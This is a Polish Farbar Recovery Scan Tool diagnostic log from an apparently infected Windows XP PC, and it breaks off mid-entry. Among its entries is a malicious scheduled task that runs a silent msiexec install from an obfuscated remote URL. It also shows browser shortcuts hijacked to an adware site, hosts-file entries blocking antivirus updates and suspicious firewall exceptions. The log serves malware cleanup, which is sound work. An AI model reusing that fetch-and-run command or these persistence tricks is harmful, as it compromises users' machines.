Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x86) Wersja: 24-05-2017 Uruchomiony przez bafist (25-05-2017 20:44:49) Uruchomiony z C:\Documents and Settings\bafist\Moje dokumenty Microsoft Windows XP Professional Dodatek Service Pack 3 (X86) (2010-12-11 11:58:17) Tryb startu: Normal ========================================================== ==================== Konta użytkowników: ============================= Administrator (S-1-5-21-2000478354-1060284298-725345543-500 - Administrator - Enabled) bafist (S-1-5-21-2000478354-1060284298-725345543-1003 - Administrator - Enabled) => %SystemDrive%\Documents and Settings\bafist Gość (S-1-5-21-2000478354-1060284298-725345543-501 - Limited - Enabled) Pomocnik (S-1-5-21-2000478354-1060284298-725345543-1000 - Limited - Disabled) SUPPORT_388945a0 (S-1-5-21-2000478354-1060284298-725345543-1002 - Limited - Disabled) ==================== Centrum zabezpieczeń ======================== (Załączenie wejścia w fixlist spowoduje jego usunięcie.) AV: Avast Antivirus (Enabled - Up to date) {7591db91-41f0-48a3-b128-1a293fd8233d} FW: avast! Antivirus (Disabled) {7591DB91-41F0-48A3-B128-1A293FD8233D} ==================== Zainstalowane programy ====================== (W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.) 1045 (HKLM\...\{D239DFD4-44E1-4239-AD5F-0DC652320141}) (Version: 28.0.1313.0 - Hewlett-Packard Co.) 7-Zip 9.38 beta (HKLM\...\7-Zip) (Version: - ) Adobe AIR (HKLM\...\Adobe AIR) (Version: 2.7.1.19610 - Adobe Systems Incorporated) Adobe Flash Player 25 PPAPI (HKLM\...\Adobe Flash Player PPAPI) (Version: 25.0.0.171 - Adobe Systems Incorporated) Adobe Shockwave Player 11.6 (HKLM\...\Adobe Shockwave Player) (Version: 11.6.0.626 - Adobe Systems, Inc.) Aktualizacja dla systemu Windows XP (KB955759) (HKLM\...\KB955759) (Version: 1 - Microsoft Corporation) Aktualizacja dla systemu Windows XP (KB967715) (HKLM\...\KB967715) (Version: 1 - Microsoft Corporation) Aktualizacja dla systemu Windows XP (KB973687) (HKLM\...\KB973687) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla programu Windows Media Player (KB952069) (HKLM\...\KB952069_WM9) (Version: - Microsoft Corporation) Aktualizacja zabezpieczeń dla programu Windows Media Player (KB954155) (HKLM\...\KB954155_WM9) (Version: - Microsoft Corporation) Aktualizacja zabezpieczeń dla programu Windows Media Player (KB973540) (HKLM\...\KB973540_WM9L) (Version: - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB2229593) (HKLM\...\KB2229593) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB923561) (HKLM\...\KB923561) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB946648) (HKLM\...\KB946648) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB950762) (HKLM\...\KB950762) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB950974) (HKLM\...\KB950974) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB951376-v2) (HKLM\...\KB951376-v2) (Version: 2 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB951748) (HKLM\...\KB951748) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB952004) (HKLM\...\KB952004) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB952954) (HKLM\...\KB952954) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB956572) (HKLM\...\KB956572) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB956803) (HKLM\...\KB956803) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB956844) (HKLM\...\KB956844) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB958869) (HKLM\...\KB958869) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB959426) (HKLM\...\KB959426) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB960859) (HKLM\...\KB960859) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB961501) (HKLM\...\KB961501) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB969059) (HKLM\...\KB969059) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB971468) (HKLM\...\KB971468) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB971657) (HKLM\...\KB971657) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB972270) (HKLM\...\KB972270) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB973507) (HKLM\...\KB973507) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB973869) (HKLM\...\KB973869) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB973904) (HKLM\...\KB973904) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB974112) (HKLM\...\KB974112) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB974318) (HKLM\...\KB974318) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB974571) (HKLM\...\KB974571) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB975025) (HKLM\...\KB975025) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB975560) (HKLM\...\KB975560) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB975561) (HKLM\...\KB975561) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB975713) (Version: 1 - Microsoft Corporation) Hidden Aktualizacja zabezpieczeń dla systemu Windows XP (KB977816) (HKLM\...\KB977816) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB978037) (HKLM\...\KB978037) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB978338) (HKLM\...\KB978338) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB978601) (HKLM\...\KB978601) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB979309) (HKLM\...\KB979309) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB979559) (HKLM\...\KB979559) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB979683) (HKLM\...\KB979683) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB980195) (HKLM\...\KB980195) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB980218) (HKLM\...\KB980218) (Version: 1 - Microsoft Corporation) Aktualizacja zabezpieczeń dla systemu Windows XP (KB980232) (HKLM\...\KB980232) (Version: 1 - Microsoft Corporation) AP Tuner 3.08 (HKLM\...\AP Tuner 3.08) (Version: - ) Archiwizator WinRAR (HKLM\...\WinRAR archiver) (Version: - ) Avast Free Antivirus (HKLM\...\Avast Antivirus) (Version: 17.4.2294 - AVAST Software) Battle.net (HKLM\...\Battle.net) (Version: - ) CDex extraction audio (HKLM\...\CDex) (Version: - ) Combined Community Codec Pack 2010-10-10 (HKLM\...\Combined Community Codec Pack_is1) (Version: 2010.10.10.0 - CCCP Project) foobar2000 v1.1.1 (HKLM\...\foobar2000) (Version: 1.1.1 - Peter Pawlowski) Foxit Reader (HKLM\...\Foxit Reader_is1) (Version: 6.0.2.413 - Foxit Corporation) Google Chrome (HKLM\...\Google Chrome) (Version: 49.0.2623.112 - Google Inc.) Google Update Helper (Version: 1.3.33.5 - Google Inc.) Hidden Half-Life 2 (HKLM\...\Steam App 220) (Version: - Valve) HP Deskjet 2510 series Pomoc (HKLM\...\{BD366B89-6784-4636-9D01-291C2016912A}) (Version: 27.0.0 - Hewlett Packard) HP Deskjet 2510 series Setup Guide (HKLM\...\{216C7F38-4BBC-4E9A-8392-C9FA21B54386}) (Version: 27.0.0 - Hewlett Packard) HP Update (HKLM\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard) IrfanView (remove only) (HKLM\...\IrfanView) (Version: 4.28 - Irfan Skiljan) Java 7 Update 25 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83217025FF}) (Version: 7.0.250 - Oracle) League of Legends (Version: 1.3 - Riot Games) Hidden Microsoft AppLocale (HKLM\...\{394BE3D9-7F57-4638-A8D1-1D88671913B7}) (Version: 1.0.0 - MS) Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319 (HKLM\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation) Microsoft Windows Application Compatibility Database (HKLM\...\{deb7008b-681e-4a4a-8aae-cc833e8216ce}.sdb) (Version: - ) MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation) MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation) MSXML 4.0 SP2 Parser and SDK (HKLM\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation) Novicorp WinToFlash Lite wersja 1.7.0000 (HKLM\...\{A1A1FF24-34C6-4B77-BDB7-A689979F018C}_is1) (Version: 1.7.0000 - Novicorp) NVIDIA Drivers (HKLM\...\NVIDIA Drivers) (Version: - ) NVIDIA nView 135.50 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NView) (Version: 135.50 - NVIDIA Corporation) NVIDIA PhysX (HKLM\...\{1C4551A6-4743-4093-91E4-1477CD655043}) (Version: 9.09.0203 - NVIDIA Corporation) NVIDIA Sterownik graficzny 266.58 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 266.58 - NVIDIA Corporation) OpenAL (HKLM\...\OpenAL) (Version: - ) Opera Stable 36.0.2130.80 (HKLM\...\Opera 36.0.2130.80) (Version: 36.0.2130.80 - Opera Software) Panda USB Vaccine 1.0.1.4 (HKLM\...\{55A41219-9B22-4098-BAE7-AE289B3C569A}_is1) (Version: - Panda Security) Panel sterowania NVIDIA 266.58 (Version: 266.58 - NVIDIA Corporation) Hidden PDF Split And Merge Basic (HKLM\...\{C91B24F6-1629-11E2-B696-21676188709B}) (Version: 2.2.2 - Andrea Vacondio) Poprawka dla systemu Windows XP (KB952287) (HKLM\...\KB952287) (Version: 1 - Microsoft Corporation) Poprawka dla systemu Windows XP (KB981793) (HKLM\...\KB981793) (Version: 1 - Microsoft Corporation) Puran Defrag Free Edition 7.1 (HKLM\...\Puran Defrag Free Edition_is1) (Version: - Puran Software) Realtek AC'97 Audio (HKLM\...\{FB08F381-6533-4108-B7DD-039E11FBC27E}) (Version: 5.34 - Realtek Semiconductor Corp.) SafeZone Stable 1.46.1990.139 (Version: 1.46.1990.139 - Avast Software) Hidden SafeZone Stable 1.48.2066.120 (Version: 1.48.2066.120 - Avast Software) Hidden Skype・7.24 (HKLM\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.24.104 - Skype Technologies S.A.) Steam (HKLM\...\Steam) (Version: 2.10.91.91 - Valve Corporation) swMSM (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden TeamViewer 10 (HKLM\...\TeamViewer) (Version: 10.0.47484 - TeamViewer) Tibia (HKU\S-1-5-21-2000478354-1060284298-725345543-1003\...\Tibia) (Version: - CipSoft GmbH) UltraISO Premium V9.66 (HKLM\...\UltraISO_is1) (Version: - ) Ventrilo Client (HKLM\...\{789289CA-F73A-4A16-A331-54D498CE069F}) (Version: 3.0.1 - Flagship Industries, Inc.) VLC media player 1.1.7 (HKLM\...\VLC media player) (Version: 1.1.7 - VideoLAN) WebFldrs XP (Version: 9.50.7523 - Microsoft Corporation) Hidden Windows Internet Explorer 8 (HKLM\...\ie8) (Version: 20090308.140743 - Microsoft Corporation) Windows Resource Kit Tools - SubInAcl.exe (HKLM\...\{D3EE034D-5B92-4A55-AA02-2E6D0A6A96EE}) (Version: 5.2.3790.1164 - Microsoft Corporation) Windows XP Service Pack 3 (HKLM\...\Windows XP Service Pack) (Version: 20080414.175805 - Microsoft Corporation) WinSCP 4.2.9 (HKLM\...\winscp3_is1) (Version: 4.2.9 - Martin Prikryl) ZTE Remote NDIS Device (HKLM\...\ZTE Remote NDIS_is1) (Version: - ADSL Router Company, Inc.) ==================== Niestandardowe rejestracje CLSID (filtrowane): ========================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) (Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.) Task: C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\WINDOWS\system32\Macromed\Flash\FlashUtil32_25_0_0_171_pepper.exe Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe Task: C:\WINDOWS\Tasks\Avast Emergency Update.job => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe Task: C:\WINDOWS\Tasks\CIS_{15198508-521A-4D69-8E5B-B94A6CCFF805}.job => C:\Documents and Settings\All Users\Dane aplikacji\cis12.exe Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe Task: C:\WINDOWS\Tasks\Jntiondruqither.job => msiexec i hTTp /D2bUH1bF1g584W clOuDfroNt net mmtsk occup php WDCXWD10EZEX 00BN5A0_WD WCC3F1EHSV35HSV35 20170420 /q bafist Task: C:\WINDOWS\Tasks\Opera scheduled Autoupdate 1494626517.job => C:\Program Files\Opera\launcher.exe Task: C:\WINDOWS\Tasks\SafeZone scheduled Autoupdate 1450125258.job => C:\Program Files\AVAST Software\SZBrowser\launcher.exe Task: C:\WINDOWS\Tasks\SafeZone scheduled Autoupdate 1458378049.job => C:\Program Files\AVAST Software\SZBrowser\launcher.exe Task: C:\WINDOWS\Tasks\Whukogercult Schedule.job => C:\Program Files\Aracerdomarafiy\xjbge.exe ==================== Skróty ============================= (Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.) ShortcutWithArgument: C:\Documents and Settings\bafist\Menu Start\Programy\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493978266&z=2955a55ef092737a03e09b9gfz8t6cdt0m4b9cee3w&from=che0812&uid=WDCXWD10EZEX-00BN5A0_WD-WCC3F1EHSV35HSV35 ShortcutWithArgument: C:\Documents and Settings\bafist\Menu Start\Programy\Akcesoria\Narzędzia systemowe\Internet Explorer (bez dodatków).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493978266&z=2955a55ef092737a03e09b9gfz8t6cdt0m4b9cee3w&from=che0812&uid=WDCXWD10EZEX-00BN5A0_WD-WCC3F1EHSV35HSV35 ShortcutWithArgument: C:\Documents and Settings\bafist\Dane aplikacji\Microsoft\Internet Explorer\Quick Launch\Uruchom przeglądarkę Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493978266&z=2955a55ef092737a03e09b9gfz8t6cdt0m4b9cee3w&from=che0812&uid=WDCXWD10EZEX-00BN5A0_WD-WCC3F1EHSV35HSV35 ShortcutWithArgument: C:\Documents and Settings\All Users\Menu Start\Programy\Google Chrome.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493978266&z=2955a55ef092737a03e09b9gfz8t6cdt0m4b9cee3w&from=che0812&uid=WDCXWD10EZEX-00BN5A0_WD-WCC3F1EHSV35HSV35 ShortcutWithArgument: C:\Documents and Settings\All Users\Pulpit\Google Chrome.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493978266&z=2955a55ef092737a03e09b9gfz8t6cdt0m4b9cee3w&from=che0812&uid=WDCXWD10EZEX-00BN5A0_WD-WCC3F1EHSV35HSV35 ==================== Załadowane moduły (filtrowane) ============== 2011-02-20 02:05 - 2010-11-04 09:51 - 00555624 _____ () C:\Program Files\NVIDIA Corporation\nView\nvshell.dll 2017-05-04 12:51 - 2017-05-04 12:51 - 00170216 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll 2017-05-04 12:51 - 2017-05-04 12:51 - 00176992 _____ () C:\Program Files\AVAST Software\Avast\event_routing_rpc.dll 2017-05-04 12:51 - 2017-05-04 12:51 - 00223224 _____ () C:\Program Files\AVAST Software\Avast\tasks_core.dll 2017-05-24 21:35 - 2017-05-24 21:35 - 06085688 _____ () C:\Program Files\AVAST Software\Avast\defs\17052404\algo.dll 2017-05-04 12:51 - 2017-05-04 12:51 - 00684656 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll 2017-05-25 18:58 - 2017-05-25 18:58 - 06085688 _____ () C:\Program Files\AVAST Software\Avast\defs\17052502\algo.dll 2004-08-04 00:44 - 2008-04-14 22:50 - 00014336 _____ () C:\WINDOWS\system32\msdmo.dll 2017-05-04 12:51 - 2017-05-04 12:51 - 00991632 _____ () C:\Program Files\AVAST Software\Avast\AvChrome.dll 2016-07-31 17:14 - 2016-07-31 17:14 - 48936448 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll 2017-05-04 12:51 - 2017-05-04 12:51 - 00134920 _____ () c:\Program Files\AVAST Software\Avast\vaarclient.dll 2017-05-04 12:51 - 2017-05-04 12:51 - 00230632 _____ () c:\Program Files\AVAST Software\Avast\StreamBack.dll 2017-05-13 00:01 - 2016-08-05 14:29 - 63846920 _____ () C:\Program Files\Opera\36.0.2130.80\opera.dll ==================== Alternate Data Streams (filtrowane) ========= (Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.) AlternateDataStreams: C:\WINDOWS\system32\es.dll:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\l3codeca.acm:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\l3codecx.ax:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\mqbkup.exe:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\mqsvc.exe:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\mqtgsvc.exe:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\msaud32.acm:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\nvcompiler.dll:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\nvcuda.dll:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\nvcuvenc.dll:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\nvcuvid.dll:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\nvdispco32.dll:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\nvdispgenco32.dll:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\nvoglnt.dll:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\nvopencl.dll:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\sc.exe:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\strmdll.dll:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\tzchange.exe:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\vncmirror.dll:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\Drivers\nv4_mini.sys:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\Drivers\rmcast.sys:$CmdTcID [130] AlternateDataStreams: C:\WINDOWS\system32\Drivers\vncmirror.sys:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\dllcache\atl.dll:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\dllcache\dhtmled.ocx:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\dllcache\es.dll:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\dllcache\helpsvc.exe:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\dllcache\moviemk.exe:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\dllcache\mqac.sys:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\dllcache\mqad.dll:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\dllcache\mqbkup.exe:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\dllcache\mqdscli.dll:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\dllcache\mqise.dll:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\dllcache\mqoa.dll:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\dllcache\mqqm.dll:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\dllcache\mqrt.dll:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\dllcache\mqrtdep.dll:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\dllcache\mqsec.dll:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\dllcache\mqsnap.dll:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\dllcache\mqsvc.exe:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\dllcache\mqtgsvc.exe:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\dllcache\mqtrig.dll:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\dllcache\mqupgrd.dll:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\dllcache\mqutil.dll:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\dllcache\msadce.dll:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\dllcache\msmqocm.dll:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\dllcache\mstscax.dll:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\dllcache\msxml3.dll:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\dllcache\nv4_mini.sys:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\dllcache\rmcast.sys:$CmdTcID [130] AlternateDataStreams: C:\WINDOWS\system32\dllcache\sc.exe:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\dllcache\strmdll.dll:$CmdTcID [64] AlternateDataStreams: C:\WINDOWS\system32\dllcache\triedit.dll:$CmdTcID [64] ==================== Tryb awaryjny (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver" ==================== Powiązania plików (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.) ==================== Internet Explorer - Witryny zaufane i z ograniczeniami =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.) IE trusted site: HKU\S-1-5-21-2000478354-1060284298-725345543-1003\...\com -> hxxp://www.msi.com IE trusted site: HKU\S-1-5-21-2000478354-1060284298-725345543-1003\...\com.tw -> hxxp://asia.msi.com.tw ==================== Hosts - zawartość: ========================== (Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.) 2001-10-26 15:45 - 2017-04-20 21:02 - 00000834 _____ C:\WINDOWS\system32\Drivers\etc\hosts 127.0.0.1 localhost127.0.0.1 clients2.google.com 127.0.0.1 v1.ff.avast.com 127.0.0.1 vlcproxy.ff.avast.com ==================== Inne obszary ============================ (Obecnie brak automatycznej naprawy dla tej sekcji.) HKU\S-1-5-21-2000478354-1060284298-725345543-1003\Control Panel\Desktop\\Wallpaper -> C:\Documents and Settings\bafist\Ustawienia lokalne\Dane aplikacji\Microsoft\Wallpaper1.bmp DNS Servers: 192.168.1.1 - 194.204.159.1 Zapora systemu Windows [funkcja włączona] ==================== MSCONFIG/TASK MANAGER - Wyłączone elementy == MSCONFIG\startupreg: DWQueuedReporting => "C:\PROGRA~1\COMMON~1\MICROS~1\DW\dwtrig20.exe" -t MSCONFIG\startupreg: IMJPMIG8.1 => "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32 MSCONFIG\startupreg: ISUSPM => "C:\Program Files\Common Files\InstallShield\UpdateService\isuspm.exe" -scheduler MSCONFIG\startupreg: Skype => "C:\Program Files\Skype\Phone\Skype.exe" /minimized /regrun MSCONFIG\startupreg: Steam => "E:\steam\steam.exe" -silent MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files\Common Files\Java\Java Update\jusched.exe" ==================== Reguły Zapory systemu Windows (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) StandardProfile\AuthorizedApplications: [C:\Program Files\Opera\opera.exe] => Enabled:Opera Internet Browser StandardProfile\AuthorizedApplications: [D:\LoL\air\LolClient.exe] => Enabled:League of Legends Lobby StandardProfile\AuthorizedApplications: [D:\LoL\game\League of Legends.exe] => Enabled:League of Legends Game Client StandardProfile\AuthorizedApplications: [C:\Program Files\Tlen.pl\tlen.exe] => Enabled:Komunikator Tlen.pl StandardProfile\AuthorizedApplications: [D:\gry\QuakeIIIArena_1.32___OSP\QuakeIIIArena 1.32 + OSP\quake3.exe] => D:\gry\QuakeIIIArena_1.32___OSP\QuakeIIIArena 1.32 + OSP\quake3.exe:*:Enabled:quake3 StandardProfile\AuthorizedApplications: [D:\lol\lol.launcher.exe] => Enabled:League of Legends Launcher StandardProfile\AuthorizedApplications: [C:\Program Files\REALTEK\11n USB Wireless LAN Utility\RtWLan.exe] => Enabled:RtWlan StandardProfile\AuthorizedApplications: [E:\warhammer\Dawn of War - Dark Crusade\DarkCrusade.exe] => Enabled:DarkCrusade StandardProfile\AuthorizedApplications: [E:\half-life 2\Steam.exe] => Enabled:Steam StandardProfile\AuthorizedApplications: [E:\half-life 2\bin\steamwebhelper.exe] => Enabled:Steam Web Helper StandardProfile\AuthorizedApplications: [D:\host\rutserv.exe] => Enabled:Remote Utilities - Host StandardProfile\AuthorizedApplications: [C:\Program Files\TeamViewer\TeamViewer.exe] => Enabled:Teamviewer Remote Control Application StandardProfile\AuthorizedApplications: [C:\Program Files\TeamViewer\TeamViewer_Service.exe] => Enabled:Teamviewer Remote Control Service StandardProfile\AuthorizedApplications: [E:\steam\Steam.exe] => Enabled:Steam StandardProfile\AuthorizedApplications: [E:\steam\bin\steamwebhelper.exe] => Enabled:Steam Web Helper StandardProfile\AuthorizedApplications: [E:\steam\steamapps\common\Half-Life 2\hl2.exe] => Enabled:Half-Life 2 StandardProfile\AuthorizedApplications: [C:\Program Files\Google\Chrome\Application\chrome.exe] => Enabled:Google Chrome StandardProfile\AuthorizedApplications: [C:\Program Files\Skype\Phone\Skype.exe] => Enabled:Skype StandardProfile\AuthorizedApplications: [E:\World of tanks\WoTLauncher.exe] => Enabled:World of Tanks Launcher StandardProfile\AuthorizedApplications: [E:\World of tanks\WorldOfTanks.exe] => Enabled:World of Tanks StandardProfile\AuthorizedApplications: [E:\steam\bin\cef\cef.winxp\steamwebhelper.exe] => Enabled:Steam Web Helper StandardProfile\AuthorizedApplications: [C:\Program Files\Firefox\bin\FirefoxUpdate.exe] => Enabled:Update service StandardProfile\AuthorizedApplications: [C:\Program Files\Firefox\Firefox.exe] => Enabled:Firefox browser StandardProfile\AuthorizedApplications: [C:\Program Files\HP\HP Deskjet 2510 series\Bin\USBSetup.exe] => :LocalSubNet:Enabled:Konfiguracja urzケdzenia HP (HP Deskjet 2510 series) DomainProfile\GloballyOpenPorts: [58365:TCP] => Enabled:Pando Media Booster DomainProfile\GloballyOpenPorts: [58365:UDP] => Enabled:Pando Media Booster StandardProfile\GloballyOpenPorts: [135:TCP] => Enabled:DCOM(135) StandardProfile\GloballyOpenPorts: [8381:TCP] => Enabled:League of Legends Launcher StandardProfile\GloballyOpenPorts: [8381:UDP] => Enabled:League of 